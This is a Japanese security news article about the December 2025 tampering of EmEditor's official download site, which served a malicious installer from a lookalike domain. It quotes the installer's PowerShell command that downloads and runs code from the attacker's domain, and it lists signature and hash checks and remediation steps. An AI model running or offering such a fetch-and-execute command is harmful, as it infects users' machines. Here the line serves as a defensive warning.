2025/12/23

EmEditor公式サイトで改ざん被害、マルウェア混入の可能性も

見出し

1 3日間にわたり不正ファイル配布か
2 正規版と見分けつかず、実行でマルウェア感染の恐れ
- 2.1 該当ファイルのダウンロード方法により影響なし
3 確認と対処方法を公開
4 過去にも同種の被害

ソフトウェア開発企業のEmurasoft, Inc.（本社米ワシントン州レドモンド、日本法人は株式会社エムソフト・茨城県つくば市）は23日、同社が開発するテキストエディター「EmEditor」の公式サイトが第三者による不正アクセスを受け、インストーラーのダウンロード導線が改ざんされていたと発表した。特定期間中にダウンロードしたユーザーがマルウェアに感染した可能性があるとして、緊急の確認を呼びかけている。

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティインシデントのお知らせ – EmEditor (テキストエディタ)より引用

3日間にわたり不正ファイル配布か

同社によると、改ざんが確認されたのは日本時間の12月20日午前11時39分から23日午前5時50分までの約3日間。この期間中、EmEditorの公式ホームページ上にある「今すぐダウンロード」ボタンから取得したインストーラーが、正規のファイルではなく第三者が用意した不正なファイルに置き換わっていた疑いがあるという。

問題の原因は、ダウンロードボタンに設定されていたリダイレクト設定が何者かによって書き換えられたためとしている。通常は同社のサポートサイト経由で正規ファイルがダウンロードされるが、改ざん後は「emeditorjp.com」という同社とは無関係のドメインから不正なファイルが配布される状態になっていたという。

正規版と見分けつかず、実行でマルウェア感染の恐れ

影響を受けたファイルは「emed64_25.4.3.msi」というバージョン25.4.3の64ビット版インストーラー。不正なファイルには正規版と異なり「WALSHAM INVESTMENTS LIMITED」という組織のデジタル署名が付与されていた。正規版の署名は「Emurasoft, Inc.」となっている。

同社の調査では、不正なインストーラーは実行時にPowerShellを使って外部サイトからさらに別のプログラムをダウンロード・実行しようとする挙動が確認された。コマンドの内容は「powershell.exe “irm emeditorjp.com | iex”」で、同社は「絶対に実行しないでください」と警告している。

厄介なのは、不正なインストーラーを実行してもEmEditor本体は正常にインストールされる点だ。このため、ユーザーが異常に気づきにくく、知らないうちにマルウェアに感染している可能性があるという。

該当ファイルのダウンロード方法により影響なし

ただし、すべてのユーザーが影響を受けるわけではない。同社は以下のケースでは今回の問題の影響を受けないと説明している。EmEditor内蔵の更新チェッカーや自動更新機能を使った場合、同社の配信サーバー「download.emeditor.info」から直接ダウンロードした場合、ポータブル版やストアアプリ版を使用している場合、Windowsのパッケージ管理ツール「winget」経由でインストールした場合などだ。

また、該当期間中に問題のファイルをダウンロードしていても、実行していなければ被害はないとしている。

確認と対処方法を公開

同社は該当する可能性のあるユーザーに対し、ダウンロードしたファイルのデジタル署名とSHA-256ハッシュ値を確認するよう求めている。

正規ファイルのSHA-256値は「e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e」。これと一致しない場合や、デジタル署名が「WALSHAM INVESTMENTS LIMITED」となっている場合は、不正なファイルの可能性が高い。

不正なファイルを実行した疑いがある場合、同社は次の対応を推奨している。該当するコンピューターを直ちにネットワークから切り離す、マルウェアスキャンを実施する、可能であればOSを含めた環境の再構築を検討する、各種サービスのパスワードを変更し多要素認証を有効にする、といった内容だ。企業での利用者には、セキュリティ担当部門への連絡も促している。

過去にも同種の被害

エムソフトでは今回の件について「事実関係の確認および影響範囲の調査を継続している」とし、進展があり次第速やかに報告するとしている。原因究明と再発防止に向けた対策も講じるという。

同社サイトをめぐっては、2012年にも第三者によるハッキング被害が発生し、一時的にマルウェアが配布される事態が起きていた。テキストエディターという開発者に広く使われるツールの配布サイトが狙われたことで、サプライチェーン攻撃の新たな標的として注目される可能性もある。

カテゴリ：セキュリティニュース
タグ：EmEditor,Emurasoft,株式会社エムソフト